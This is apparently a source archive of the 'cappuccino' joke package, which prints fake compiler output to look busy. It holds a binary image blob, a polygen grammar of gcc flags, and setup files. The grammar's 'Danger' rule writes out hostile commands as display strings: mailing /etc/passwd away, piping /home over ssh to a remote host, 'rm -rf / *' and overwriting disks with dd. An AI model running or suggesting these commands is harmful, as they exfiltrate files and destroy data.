`Fr,Upgڇ_6mGRv/4dF=3d5Ӎxq3zvYvlw_ro-׃:4HF*\`;k09|Cھfu鲉m-((e\?OY; p04_zgCkļ9J@a=kw6++:Kq Aa2.hjm{RҝK?@֌&֘S;l'l7QT5b(ۨ[Jo~G؊9z'pm5n9֖L`Hp#qΧz[]t ݴ}C"lچI%,篩I'֙%I(o-éM]-TFj΅#1[ma9Z-]z510e60RRY+am"WP94V[i\)eUV"`k"#EgdTl\g"S\~?gFA{*ElUO4ԋRʐNj<ٽ$yJGڑ?< MIl$υɦ.19JBZ¸皮`ai kF̝'dɡBdޥu3 6E.VG4@4{Nži1#PXP/hZ/s^Oq'GMNKWrHӯ&N~@CH؉,tUOC*#i kHhؐW\GF)L5 g ֯~gT:Fj׷(4!bZnvZmYO'Z}jG9 !ۜH-ۊL5(W $f%z3GlyQzȬc0#.Pڮ0sQg-ܜґɡ8SNT62)'b.%X4ع.9)4WcB6 oARdl5ilCuRbIp 6Fhևd&l# PS&&yT8JoC,w]H&@]Th ӣ].4н3I5IDv9?C\USOcmZCS}{Fv<6@$[Νfg~0Qxv]`8f\Lֺu"y3ۥ _[$FPN1T ߙ,$-lFbZ$0W @7Ωm%ܐȤ21R>6qz "NtkDb:}j.9Okba sGL\eb:Gk6 s]al `a}Uǁrl.e!i됣Vi}Ďq---ҠXOaK<}06Wd ]x].-n Tg+C5w Ly&DJSΈܨ56V$d_A@>;ҪqkL-օ{ NR\ݖq)Kd"AɩIH1J3dbzI=Pˠư:Lt:[1e~I l-#fqVhp*3GT?R^HټI,k\+|0KRpyүT`An79ٓ4@1v?@&\J w;?%rPr(gupJSvqHhRNj:] @I\ZZuҗytK#h&lv{X"b,l SEM71Qp) ޛ|03IWfiY17M,ңdx* wKn2j* F,ԕ"V/$ݟu]04&+qq[6z6A* #lV 9tf;W{Ve۷Kh/v̇Y/$l&Th!f5F0WC Mb(PZXu% annmNlBnN{4[OEOs2Cmi#qCuhn-;cHo*mhڌZmo#uaZf43Kuԭ7%z7T_]Lnj"]y) iּCk}#P  ួ^DZ2p}owmYikT ՚[5 qI:H<{c nc8WB;Qu1KKaXj-_E|+2DQIr ׃*, U8&N\.sǟ ڰXT[^=;'O. }3Aw&5fXc#^Oj;Pɚ% +3>EAϖ7TK;IZgA1]E\SQufL%b8YCkGjZ[֘M͸Τ2,9#*pCj G]՞G#sLsL2[Ա c zTe`E;=RhgNEk^nXW%xVmndK&ڥ:n횉۲%Q2G4ܳR%^YbUaՊVPaׯ*rAY(SMNӤdɌFͽ'ҠO!Ԯo#oVG3Vݙ95l #TMS_*  n-Qn^r;X_,vrad#`u""bӬ.AJy-U@Vd TlL0]*|ʮ1E5 ߗ:;pKHe'6Y ;(Z̥ G?$Fuk * 1Uąݚii$g]P_Lfl8sЧhjq_g>4!Yޯ}$sR@ִɉy gH$+,xkLg@'?ƨv3E$rc(֗GpKJFq<|Qe0i`)ǵB{xÏV}تɖY@$cڎhǮjg\۵X4Ie9!$=9ȶY%23}+xxiWɢC * Cx%F1JfhqCcG-=Q ymO߽^ #1@.^Iک PP,88uֵqjf):w zOQ]s'SӚyqt4I]mo{It~X떭X":z D7V\,\BRWW|.PFhmw!SHЪMu/*XҍY?4gkwu^yd>8".+ y;CUr7լҶ)-i򯚃@58rTQkxD' Tl#5lZF]ݖ%EXlp+/L+dxMFF{fo S8faE.P0r7ഘa]KcB混pU6+˸tLğ{4ly[IN/e{($T{'elQ!ӶW7RH ߠDc;Vճ6eBA<itz_NkZU@AhWӱ|`S$z\r\TcR2B1K,$`3NHUȒzygKFQL/h@8 @#@T XW' s4 ոbem:A(|TϞv=9;)?jfN)ncZsQ$KwiZ{oajiX~⋤x/@}WOwnj~]yrv 14eB*쯝7Ċ=0qQ27B4vPConj̬0y:ī,} 1K%l M␣}(~nѹt91|X+ZZ~oV ,=j-cs$dt0'&{3ƟF&n9' bPQUSkjPR9\}s[]^"VvHb-nO%}j[D`eB(T 97k#t9خ DJf?NI' VEfAqWalsTҦ]@"A#8f_/'INoǿg7]ƙ-!E֛m$ `z=88wa9ba'L52ƿOzݶw%PӬ Ld J6zw$$Z%gl*n:Tl٣ i@d\ kRAf"$?(ړsp3^iC!%c5lۗVV:ζu9͝8y=޳k%,0UQMuy4Me4=d+78ۊ*߭rs|Q [,;Vg.X84'eh[,qU@r:k EY<ӕ"/L0Dq/PUOѣvR53d7W*aŅg#?d@y+a.}>y>|xyu 1@ XHG?RjO۲]Ͻ9KXiPx$eZ޾;WbCy$@ja"q9?V>nj"i}&O-d}צ]wK>k4cY8s?eѽA#7%Px&Om(ZmQ nṈs#R㓑$|?߆;^yWc0" ~6eDzȣA+Wԟby\Ң"SWPeFX`wG}%VF23T}Ld=&9\W9Mj&wiϨ*[jzl2+NĞ7\ϊ:CqnN 4 =SR? 7[nZ\bĝ@;39xrajBlm+OՖomDoZfqH:nn/C"D#c8➻3Lnƒc\E4)J<#ɰ߈zHT(RK R&ܢqǡ+"֊jZ|We8>yԴe,_k@y%BaTz@6*3\]:UleSB+5K% 8\'!I$}ᖠuFXcq.tVܢ5$+"2njzaZ3~0Ċuҩ9ǥa_K? \E?"yqغP׷J qtw@zkHq oLrmmdbJ1{*3q4aqYX$c`+&+"π]ش@5mQj+s?oS68g3Y+V).eȟ4 gAĚOħ[Mœ1%JMzg{==Dnkfmv5a` ]cڢEvK{(SA$Eoa'iUTI~}ZfRԜ]ͫY(\,Mx 225@ڞlݳs%VS~ĚI|@Pjo\a{{]>2~XXphW71^[J\z5 +i, [ kokCwlo sjJ|j$Utn'x.#WU2ƴK(hUYy+m :W,7ECcG*lHÚ-CzǥW5?dJ7fUGWb\9rF,d޽ Ȯ b$Z:lw҆9ϊGP;r+NJ|/h JFT Iլ/cN\FN=S-4t?- IGPXvg\IP9 K*^X{Q hbrW?2+_-b O22WL W,^R85vvw&5b">_w//}<_O.B ?۔)7"< kvMO}* L2=i9,jS DA-|+y!5CsVBԅ1|Lݩm~cLGCx pxjf_>SwUu'EԖ!i\*’{fx,6`zE |r~G >>gOR$R#8#C^i:iJfɄy9WNaiV's=Vu T^MI|֫p?Xr@5+nckpO4X\3Xћ5*֑<ΕkLJ#Lrz<ۚZܩ5X~.PbK[jlEUFde_ծny|<جjŬ/.k!f?fߗ $z~34/ZGn"c+Zgт*g: y `-tX R|'KtmMRtT{7fVBOYzs]wf eI٩qTW% EHK3wpvfݻTբW1Lƿ~ .e翺;algGm؏AEf pna.o-ķxc\vo=/DSR�1NMG8qOXء^H M5eҵ7i ]due#g8Uc/8iYt}hfZ6b;ڱ9/ø##Ʀ=FD#y4I=D~_PhR[iˉ]|=8T g௽$f86K` Tpdus9BP&|#Aff8zkXQ]qujIW9oԒ~UxXQz.կ!d`Ƥ⮙7HzJ~6d_*#ܨnTyWIҿhA:C`vinV_9oZRoJ)\4*܃ n89n>,\HщX %c,1+Gmk߫/HF.H}>+$%bs]}<3DxԱ 씗*pT`\LqDtBzP;}hScS4ΨGP$5%+Y<\1MyX$9"]۽Ŵ΃![=):9$4|(˕Eu@~j'aoYb V \[(闠3}s6M je5ܫJ. |ҵJE< ^A9@|}j\WEW?J/smC-{Ÿ}B) {W6>vOlI5hv g261Jя${fp;wZv6i)t(cY@0|NK-{1[Fd&zX+?GfW"6#v#5_5*j9f}wC܉QFIǨ= 0d}+7V1j^C"9s[U،Y#9lfȬW/s6;p UJT?0$v2.4wOrTp>JuK)rK9!ɤ{dq9ߊ-`P) L|Dž%(8 cI p=*}mGO(d),n20A1YɆ`CEZMr#q޶cȞ˅h?~F\j&Z4Z;up.-Hb:G];~- nXWzGt\Rږ(xx givԮ&b/n,2a}']AhznC6X Hv$$IeS[608>?HD%$,j0@aPfVqUI6ۊMSNuM": }~<m^to{u(Ki ҏ@;'^4>u7B~ې2+j4Q6aXA 9'CV.'iĖVf9ZiyZ0*(νvwrd3p{鶠CUa,h >v=.׶7:!/[}*xI$fn0˓!" Uwpyn0RKQ}=9#޻Ū<%UMe+C4xn)pWt:,OP.즷 $u.02{ w~nhe'BV8щfKI23OG?Z/?\wcae̳D0_7؞p%oӱΉ-MyVjQ^[mKBٔ~O1qkL;V'z vsIzzB]D\ -۸w4e@<[D$eqղ_x?et3F+ wbWe$J75tX?jĵJ\QHa95xb98cT;gD2Ef8Z͌=5dLpj]"+,yU4m? WU#~_CT>\dW]&81drc #*N 8#S 3 znڪ-sHϰ(KDۢg^./8>f_ȷCᇠu& 9JҼ1v[hR k6rfXcl'Io:K.H$|k*f*KuMͨFVr >{0ip-i3RV91q{6à{nrT3nk76ujʤ1SWBm=a FUN~f)]|QƸ?TĿGD=JIHү,S۾4Ub; L=Eq8Qkhfq/Idw:7o*|p̶.,*a:O(|`.zW,_(iPkɷ{|F}?[uaj>oo3a nf{H_.ɿZ0 镌2`' yaJMW8VM;Fy3 z6hԸi-xjiEcELJn==j8==GUg=[ nnc$ ٬'u+a c5?Cs!x͹qϦs uK'-/4 ԭ |;%g5hL گ{cdXZ4%Gֲ]CJB+ndG﻽9 {T+vPfOϚH+-sM\ e^uy{2[ޥ c'U$y0G"34 j]xz͉E>f$LsFmui,S^2i㲼!S;?o5Yry3#X`3\7vF!7\4,yAe+Z:{C Hjmuuu 0߾}O{fgMjd[, : Ժ@﫟O,$l5uhzS$1 (ɠw28 kE*5|ֶcRkć*&ޖ1'ڨWcd\x~3a=bI j̖SP滺LdM=g:5b5asi&Š-T G/p @~oʗ/8E8VͥT?W9Ъޜڕs{`rOjDkY״^f-HELnUwYկ ; ߗrkeF )0GjRGDccp~c)Cq0"ǁSm!SUվ?Y\6X @_Im!g0L5j͒0Qg& If7(z?Z]y9 ZrPT'Ufk{>yjYWL0*4$xI$zҡfHl28Yz-D]Y9SP-GQbX¢Hʜb2F9QUfgU8d~͞#]c6L砞Elj/s^ʼnRޞxe XuY7ZmSJ0u'Vq[3H++ t8U}ҙ$cPqߨrl{?bdZ9 ߠz!5js=|p֢z{~NJ6fhi[lvI 3xk:@f &s&=A5~$$L!Foy 68gLHH5 sqpSF3M]*xm$VIfT- ZTO&}_^Npj,˗ IJUosEz_ijjԲ~f3V&Us@eM|5*.f>TAyomM08'8P<\rhMZ&L QH1Ռp+KZe_,:%ZJԭVko5N#E ڀ[}S|͟;RGl'Ljx[H#(GK ۃyq#UA^2ۏÌ;0d= uiL*zR})'Wf;sҒxI$~g'D=pGzOI&FQ{-f'Fw흔 q(>ĜRJ\"E<>tI٩̪}~JRPf>ճ ⤺flqn#Y}X}Z(a)诧BVGesګIG,a5o*|3ÆWa9<~qky{3_Ai|V+23Fmb|dfzd;yY;NhUcIHq{;ȟe%".p!0HFǂ} 1 ̄0>sN r=ǽ$;G>NOGF9]TD' k+}E2ң;ȧJ ңJ3_jMո&̃Q6F1RRa\)LrďM=Hlȥ8IU5=|H!]ҷ2)g'H%Cf?&yS̠*^~^Ŗ\X&O;BuϠj]Xm]nj'ڛe9%#lmUGP/%Y jaNxǢK.M!n eYV#ը(l*,qBK4<c 9i ϯjDLhmӧL~;L(Ai-zi-H9⚑©972|.ĶMz9<RSUHǽ"BLBJ#e`ATx*Bv\e|as>z܍,4lPlV䰎U$)DIrB})yjN1֖^?yH\\k-QL\dlpF;Pr*mKJ 퇥XlZXpGޏ؟ޯL'ͯQ+|`glOD!RO4ROIc*4v#" #8m2؞2`i8Y1Vgj[w49bNFsޣ]J`w,7w'J!ޢ=)aKsO948١>*CTQz(zfQHRIzR4t6zTgM{JQfNϿ.& Nqk2ؑ (@֝UU69?dNWlI12L9jx.۸=|f~#*TC>4QCD8%$":g*,E!=j qzѱߵ6Î*_A ze6=^)F?JS!ӊ%79NZAZ^ OZK}:֐… g'qN4`)#c!BR)U,Ӓ)xHaU7EdjN1:äf&8gh*ϯ'9cT5VZTP?[OsRU09l-%)T`cJ jgy@נpIP )JQzgs^+qJU(GI&%R0dN3EKT#]²b@*0ho/' ({ z 2סNާڞAV= ӥ`Q'fyѻ Fvlz3dtXl saZ8DՈGTlxjg'֝Kd٤uwInE~3CPڤpMό{㊩DzIP }8 jH{NqдH?[vȠ6WhQk`MY }i 7- /e)ګEq8bTk1Uv@0r{Q{YsX%j'Ԙw9Q?XvNFb2}*4m{S`vН C;$g֜'zm1Yֆ{D*y9z0ARϽɋD͏jК`A 傸G)h) ʘFRZn zEH֫ߒ~ъʧ?Ziсw=!=Bh5l~ˣv]$FHʘ$$[4S %AɮbNKP.uX#=sY!WMlFMPw:C>0lGKSɧH{Cd;Zd}*z4,(qcYbǥ}E@=)^{W$syI+JȘ\y>5?ZYzsJD P{(/GÑI-I)H< $)9(7CEYoKKbe9S= f:G տj-!LddNhݾ_$% qjB

%d|nF}g%[*xP) iIFo%m`̐Ř߭XMfew򼾒IOGߠl}=Y9[>Ht(q^㷥5kQJ|cҾ#=4q{{)0Psui3$֘NW6ZֶtĉO0󟙁`q@}Cu-, E9TOEzTi,xdu*ya[gx+Ձ2ҏ-~{W-l>Z+6GA?hZIhx wSƇ 8j7KgmyN  (㜜v 7diN :m3vӜ~l:C%Haڥ6qڥDWn;T5ǽ+#!ROzwO%=['xil=k4icI45 kzW Z/ҕP !Rp߲)ARx.m64KOC7UZ໷]Rb :AGڹ*ymI1TC]#.\ҍ+\" d 9: q `>⏠7Ai] ྥP3!O,IPKҹ }3w!|9{{vWƋ]g8.gZ]TRWڥ[jHYak8Gܺ}Ņש] Y|FF<[=;KY){- ѽ5KxΣnd$PLK$I}h~Ҵgj{qX[ gԷIM/>~Gj +R݂(lņr&GS,r0I֓ƽvjn vkkq;hLA28Puw\Jq bXS9_DMi܀iZ"m&;{oŷѴȴ5(Im\2(sXܰ~%f5-E+;2GQ:ml8a`z$v͟BмYNک~,5$ J4G#r lVk Zneʲ3ԧHjv> nM3\4ѥ[A(/VWUN1zucEwnb;y,xg <1UۓMt9N Ŧh] ~jZ[Ab͒ jt<06@/KdY'ǔ; ]V ,Ň:E *O(UUd=)Ч]ld%q^@{GR@?5 <>K[gj>DfJ -pnOoccw.E:UEV;}sg[uxnmGqhZ)idHU1}[YMm,F.!];N纅@$`aEahZt]o~ffi-3YTd d{UsChmM]?oZũαK[% J@=\V`_5ź'#p@ ?vGZ4S\pKk{a=mӒp#`1J4/<12xȏHSLO[G8o}Z]ZVMĀgj (]Qyesm~m ?aɌ"6C1z.k3:Z[G =Ư4M,C2%3⍕csާC?ug9z<,=PtL *lS e4p,QIfcJ&[jk߮/FՋ^ =8 椦ݨlk F?١q˞sKLdΡ^g0 ÎAhY994ڼ  ʐ,@1J~?W+dR-W.Glb`dEF{ 2BPE'"P_rkqFr#*ڽPs4I'*[Ɍ'ڣ  J<6%AaڥzO"iRrzF=*9Y$F&ij75_AU_1!(\珥N$ f<(v?i{[4)f ?d^(+rKpSoOa QGlW˜>7:,q0{t7'iMbbDh'|G~zK-w==^w}Ťq-f(c @'; Ppx_cg[Ьb*t}ܺ xAbc(~Vi 3?M2DIy;=@E±? <3[UAӊ$uWߊ=T] -QِJ_W!.,tdf 2 |3Ҩ' 뚬.%{~klZ;J.l/mYb|r] f5.-h@`Tz+W5e[ׁto7?$ mR/jIhHƙ];}:ŎI%\>\8l-tJù'u34zij%S%ץVZO05ڛ UP9={[KZۛ=4B48c\c1-ߥZ+6ñ'e٭M!5sӣ=_Dؖµex-"em6Y=.(Si3kuKF5)BLH?Q; Zc~l7qqO(g;EQjjQ%R M}tω3F'1t\O}ӥ%ixO\`&TXREčkUӴ"`V'\dfchk~;dCEv=;ۮۋ(V,=Ÿ#, 6} fm}yR[^Kb;+ mZvMVP1f$l9u'U^fAeڗݼ(d¦SG<5fNP|E_H-|ɧ~186[|p@}`8ܜU(FI-ⶇGmͷ uX& {AQ]Ĺ'EvNEʀI)=Bq?cY&>')m6O*oXߠ =FXukhhÛi}SzI'Z͚ݔ*-PSP,9+TEvVY*o<ls yɦ;PD ~qS`b-_W=Ay=HgB5}D2"sn’_#r_WԱH}':Uj;⾯1tѐpsFikt11ȯ .϶kۋTy$ gJ(/keJcƌ#E1}Ye٧Љ>Tg~ZD#jQ@z:쩞28zv+G!8`q޾1WhqbA)azcQǭ}_Tc51ږskX|IjIvW̲08.UzF[w9UJ+|}UfPJx>Y]dd}HApi$_WEu_}J9qIf.cappuccino-0.5.1/compileline.grm0000644000175400037200000002557110521762637017065 0ustar cgabrieltruelite(* Copyright (C) 2000-2006 Enrico Zini This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License. *) I ::= "title: Compilation line\n" ^ "author: Enrico Zini <enrico@debian.org>\n" ^ "language: english\n" ^ "status: useable\n" ^ "topic: Debian\n" ^ "created: 16/09/2006" ; (* Run with polygen -X 2000 compileline.grm |randtype -l *) S ::= Command ; Command ::= ("g++" | "gcc" | "as" | "cpp" | --"gfortran" | "$CC" ) {Cflags} {"-o" InputFile^".o"} {InputFile^(".c"|".cpp"|".cc"|--".f77")} | ("g++" | "gcc" | "ld" | "ar" | "$LD" ) {Ldflags} {"-o" Filename} {LinkerInput} {Libs} | ------Danger ; Danger ::= "cat /etc/passwd | mail president@whitehouse.gov" | "tar zcf - /home | ssh" Filename^"@varez.uuae.tg \"tar -C/data/`gentarget` zxf -\"" | "rm -rf" ("/ *"|"~/*") | "yes | format c: /autotest" | "dd if=/dev/random of="^Hddev | "yes `polygen damage` >"^Hddev | "polygen compileline.grm" ; Hddev ::= "/dev/"^(s|h)^d^(a|b|c|d) ; InputFile := Filename ; LinkerInput ::= Filename^".o" | LinkerInput (_ | +Filename^".o") ; Cflags ::= {["-g"]} {["-Wall"]} {["-O"^Opt]} {[Cflag]} {[Cflag]} {[Cflag]} {[Cflag]}; Ldflags ::= ["-L"^LinkDir] ["-L"^LinkDir] ["-L"^LinkDir] ; Lib ::= "-lm" | "-lstdc++" | "-lz" ; Libs ::= _ | Lib Libs ; Filename ::= test | module | master | slave | main | aux | extra | functions | callbacks | interface | implementation | ui | gui | templates | utils | utilities | funcs | ----porn | ----crack | --unused | db | base | net | network | sockets | --unknown | old | new | -stuff | --oldstuff | ----impossible | --faulty | ok | tested | random | --boss | -foo | -bar | -baz | ---drink | conn | layer | security | http | ftp | protocol | proto | prot | tcp ; Opt := 0|1|2|3|s; LinkDir ::= ("/usr" | "/usr/local" | "/opt/"^Filename) ^ "/lib/" ^ Filename ; Cflag ::= "-ansi" | "-aux-info" | "-BPREFIX" | "-c" | "-C" | "-combine" | "-dD" | "-dI" | "DIR" | "-dLETTERS" | "-dM" | "-dN" | "-dumpmachine" | "-dumpspecs" | "-dumpversion" | "-E" | "-fabi-version="^N | "-falign-functions="^N | "-falign-jumps="^N | "-falign-labels="^N | "-falign-loops="^N | "-fallow-single-precision" | "-fbounds-check" | "-fbranch-probabilities" | "-fbranch-target-load-optimize" | "-fbranch-target-load-optimize2" | "-fbtr-bb-exclusive" | "-fcaller-saves" | "-fcheck-new" | "-fcond-mismatch" | "-fconserve-space" | "-fcprop-registers" | "-fcrossjumping" | "-fcse-follow-jumps" | "-fcse-skip-blocks" | "-fcx-limited-range" | "-fdata-sections" | "-fdelayed-branch" | "-fdelete-null-pointer-checks" | "-fdiagnostics-show-location="^(once|"every-line") | "-fdiagnostics-show-options" | "-fdump-class-hierarchy-"^N | "-fdump-ipa-all" | "-fdump-ipa-cgraph" | "-fdump-translation-unit-"^N | "-fdump-tree-alias" | "-fdump-tree-all" | "-fdump-tree-ccp-"^N | "-fdump-tree-cfg" | "-fdump-tree-ch" | "-fdump-tree-copyrename-"^N | "-fdump-tree-dce-"^N | "-fdump-tree-dom-"^N | "-fdump-tree-dse-"^N | "-fdump-tree-forwprop-"^N | "-fdump-tree-fre-"^N | "-fdump-tree-gimple"^["-raw"] | "-fdump-tree-inlined-"^N | "-fdump-tree-mudflap-"^N | "-fdump-tree-nrv" | "-fdump-tree-optimized-"^N | "-fdump-tree-original-"^N | "-fdump-tree-phiopt-"^N | "-fdump-tree-pre-"^N | "-fdump-tree-salias" | "-fdump-tree-sink" | "-fdump-tree-sra-"^N | "-fdump-tree-ssa-"^N | "-fdump-tree-storeccp-"^N | "-fdump-tree-vcg" | "-fdump-tree-vect" | "-fdump-tree-vrp-"^N | "-fdump-unnumbered" | "-fearly-inlining" | "-feliminate-dwarf2-dups" | "-feliminate-unused-debug-symbols" | "-feliminate-unused-debug-types" | "-fexpensive-optimizations" | "-ffast-math" | "-ffinite-math-only" | "-ffloat-store" | "-fforce-addr" | "-ffor-scope" | "-ffreestanding" | "-ffriend-injection" | "-ffunction-sections" | "-fgcse" | "-fgcse-after-reload" | "-fgcse-las" | "-fgcse-lm" | "-fgcse-sm" | "-fgnu-runtime" | "-fhosted" | "-fif-conversion" | "-fif-conversion2" | "-finline-functions" | "-finline-functions-called-once" | "-finline-limit="^N | "-fivopts" | "-fkeep-inline-functions" | "-fkeep-static-consts" | "-floop-optimize" | "-floop-optimize2" | "-fmem-report" | "-fmerge-all-constants" | "-fmerge-constants" | "-fmessage-length="^N | "-fmodulo-sched" | "-fmove-loop-invariants" | "-fms-extensions" | "-fmudflap" | "-fmudflapir" | "-fmudflapth" | "-fnext-runtime" | "-fno-access-control" | "-fno-asm" | "-fno-branch-count-reg" | "-fno-builtin" | "-fno-builtin-"^Filename | "-fno-const-strings" | "-fno-default-inline" | "-fno-defer-pop" | "-fno-elide-constructors" | "-fno-enforce-eh-specs" | "-fno-for-scope" | "-fno-function-cse" | "-fno-gnu-keywords" | "-fno-guess-branch-probability" | "-fno-implement-inlines" | "-fno-implicit-inline-templates" | "-fno-implicit-templates" | "-fno-inline" | "-fno-math-errno" | "-fno-nil-receivers" | "-fno-nonansi-builtins" | "-fno-operator-names" | "-fno-optional-diags" | "-fno-peephole" | "-fno-peephole2" | "-fno-rtti" | "-fno-sched-interblock" | "-fno-sched-spec" | "-fno-threadsafe-statics" | "-fno-trapping-math" | "-fno-weak" | "-fno-zero-initialized-in-bss" | "-fobjc-call-cxx-cdtors" | "-fobjc-direct-dispatch" | "-fobjc-exceptions" | "-fobjc-gc" | "-fomit-frame-pointer" | "-foptimize-register-move" | "-foptimize-sibling-calls" | "-fpeel-loops" | "-fpermissive" | "-fprefetch-loop-arrays" | "-fprofile-arcs" | "-fprofile-generate" | "-fprofile-use" | "-fprofile-values" | "-frandom-seed="^Filename | "-fregmove" | "-frename-registers" | "-freorder-blocks" | "-freorder-blocks-and-partition" | "-freorder-functions" | "-freplace-objc-classes" | "-frepo" | "-frerun-cse-after-loop" | "-frerun-loop-opt" | "-freschedule-modulo-scheduled-loops" | "-frounding-math" | "-fsched2-use-superblocks" | "-fsched2-use-traces" | "-fsched-spec-load" | "-fsched-spec-load-dangerous" | "-fsched-stalled-insns-dep="^N | "-fsched-stalled-insns="^N | "-fschedule-insns" | "-fschedule-insns2" | "-fsched-verbose="^N | "-fsignaling-nans" | "-fsigned-bitfields" | "-fsigned-char" | "-fsingle-precision-constant" | "-fsplit-ivs-in-unroller" | "-fstack-protector" | "-fstack-protector-all" | "-fstats" | "-fstrength-reduce" | "-fstrict-aliasing" | "-fsyntax-only" | "-ftemplate-depth-"^N | "-ftest-coverage" | "-fthread-jumps" | "-ftime-report" | "-ftracer" | "-ftree-ccp" | "-ftree-ch" | "-ftree-copy-prop" | "-ftree-copyrename" | "-ftree-dce" | "-ftree-dominator-opts" | "-ftree-dse" | "-ftree-fre" | "-ftree-loop-im" | "-ftree-loop-ivcanon" | "-ftree-loop-linear" | "-ftree-loop-optimize" | "-ftree-lrs" | "-ftree-pre" | "-ftree-salias" | "-ftree-sink" | "-ftree-sra" | "-ftree-store-ccp" | "-ftree-store-copy-prop" | "-ftree-ter" | "-ftree-vect-loop-version" | "-ftree-vectorize" | "-ftree-vectorizer-verbose="^N | "-funroll-all-loops" | "-funroll-loops" | "-funsafe-loop-optimizations" | "-funsafe-math-optimizations" | "-funsigned-bitfields" | "-funsigned-char" | "-funswitch-loops" | "-fuse-cxa-atexit" | "-fvariable-expansion-in-unroller" | "-fvar-tracking" | "-fvisibility-inlines-hidden" | "-fvpt" | "-fweb" | "-fwhole-program" | "-fworking-directory" | "-fzero-link" | "-g" | "-gcoff" | "-gdwarf-2" | "-gen-decls" | "-ggdb" | "-g"^N | "-gstabs" | "-gstabs+" | "-gvms" | "-gxcoff" | "-gxcoff+" | "-H" | "--help" | "-I-" | "-IDIR" | "-idirafter" | "-imacros" | "-imultilib" | "-include" | "-iprefix" | "-iquoteDIR" | "-isysroot" | "-isystem" | "-iwithprefix" | "-iwithprefixbefore" | "LANGUAGE" | "-LDIR" | "-M" | "-MF" | "-MG" | "-MM" | "-MP" | "-MQ" | "-MT" | "-no-integrated-cpp" | "-nostdinc" | "-nostdinc++" | "-o" | "-O" | "-O0" | "-O1" | "-O2" | "-O3" | "OPTION" | "-Os" | "-p" | "-P" | "--param" | "-pass-exit-codes" | "-pedantic" | "-pedantic-errors" | "-pg" | "-pipe" | "-print-file-name="^Filename | "-print-libgcc-file-name" | "-print-multi-directory" | "-print-multi-lib" | "-print-prog-name="^Filename | "-print-search-dirs" | "-Q" | "-remap" | "-S" | "-save-temps" | "-specs="^Filename | "--sysroot="^Filename | "--target-help" | "-time" | "-traditional" | "-traditional-cpp" | "-trigraphs" | "-undef" | "-v" | "--version" | "-w" | "-Wabi" | "-Waggregate-return" | "-Wall" | "-Wassign-intercept" | "-Wbad-function-cast" | "-Wcast-align" | "-Wcast-qual" | "-Wc++-compat" | "-Wchar-subscripts" | "-Wcomment" | "-Wconversion" | "-Wctor-dtor-privacy" | "-Wdeclaration-after-statement" | "-Wdisabled-optimization" | "-Weffc++" | "-Werror" | "-Werror-implicit-function-declaration" | "-Wextra" | "-Wfatal-errors" | "-Wfloat-equal" | "-Wformat" | "-Wformat=2" | "-Wformat-nonliteral" | "-Wformat-security" | "-Wformat-y2k" | "-Wimplicit" | "-Wimplicit-function-declaration" | "-Wimplicit-int" | "-Wimport" | "-Winit-self" | "-Winline" | "-Winvalid-pch" | "-Wlarger-than-"^N | "-Wlong-long" | "-Wmain" | "-Wmissing-braces" | "-Wmissing-declarations" | "-Wmissing-field-initializers" | "-Wmissing-format-attribute" | "-Wmissing-include-dirs" | "-Wmissing-noreturn" | "-Wmissing-prototypes" | "-Wnested-externs" | "-Wno-attributes" | "-Wno-deprecated" | "-Wno-deprecated-declarations" | "-Wno-div-by-zero" | "-Wno-endif-labels" | "-Wno-format-extra-args" | "-Wno-import" | "-Wno-int-to-pointer-cast" | "-Wno-invalid-offsetof" | "-Wno-multichar" | "-Wnonnull" | "-Wno-non-template-friend" | "-Wnon-virtual-dtor" | "-Wno-pmf-conversions" | "-Wno-pointer-to-int-cast" | "-Wno-pragmas" | "-Wno-protocol" | "-Wold-style-cast" | "-Wold-style-definition" | "-Woverloaded-virtual" | "-Wpacked" | "-Wpadded" | "-Wparentheses" | "-Wpointer-arith" | "-Wpointer-sign" | "-Wredundant-decls" | "-Wreorder" | "-Wreturn-type" | "-Wselector" | "-Wsequence-point" | "-Wshadow" | "-Wsign-compare" | "-Wsign-promo" | "-Wstack-protector" | "-Wstrict-aliasing" | "-Wstrict-aliasing=2" | "-Wstrict-null-sentinel" | "-Wstrict-prototypes" | "-Wstrict-selector-match" | "-Wswitch" | "-Wswitch-default" | "-Wswitch-enum" | "-Wsystem-headers" | "-Wtraditional" | "-Wtrigraphs" | "-Wundeclared-selector" | "-Wundef" | "-Wuninitialized" | "-Wunknown-pragmas" | "-Wunreachable-code" | "-Wunsafe-loop-optimizations" | "-Wunused" | "-Wunused-function" | "-Wunused-label" | "-Wunused-parameter" | "-Wunused-value" | "-Wunused-variable" | "-Wvariadic-macros" | "-Wvolatile-register-var" | "-Wwrite-strings" | "-x" | "-Xassembler" | "-Xpreprocessor" ; N := 0|1|2|3|4|5|6|7|8|9; (* nker Options_ *Note Options for Linking: Link Options. OBJECT-FILE-NAME -lLIBRARY -nostartfiles -nodefaultlibs -nostdlib -pie -rdynamic -s -static -static-libgcc -shared -shared-libgcc -symbolic -Wl,OPTION -Xlinker OPTION -u SYMBOL *) cappuccino-0.5.1/setup.py0000755000175400037200000000064410521762637015565 0ustar cgabrieltruelite# -*- python -*- from distutils.core import setup setup( name='cappuccino', version='0.5.1', description="An utility to let your boss think that you're working hard", author="Christopher R. Gabriel", author_email="cgabriel@cgabriel.org", url="http://www.cgabriel.org/software/wiki/Cappuccino", scripts=['cappuccino'], data_files=[('share/cappuccino', ['cappuccino.grm','compileline.grm','cappuccino.jpg'])], ) cappuccino-0.5.1/PKG-INFO0000644000175400037200000000046110521762663015141 0ustar cgabrieltrueliteMetadata-Version: 1.0 Name: cappuccino Version: 0.5.1 Summary: An utility to let your boss think that you're working hard Home-page: http://www.cgabriel.org/software/wiki/Cappuccino Author: Christopher R. Gabriel Author-email: cgabriel@cgabriel.org License: UNKNOWN Description: UNKNOWN Platform: UNKNOWN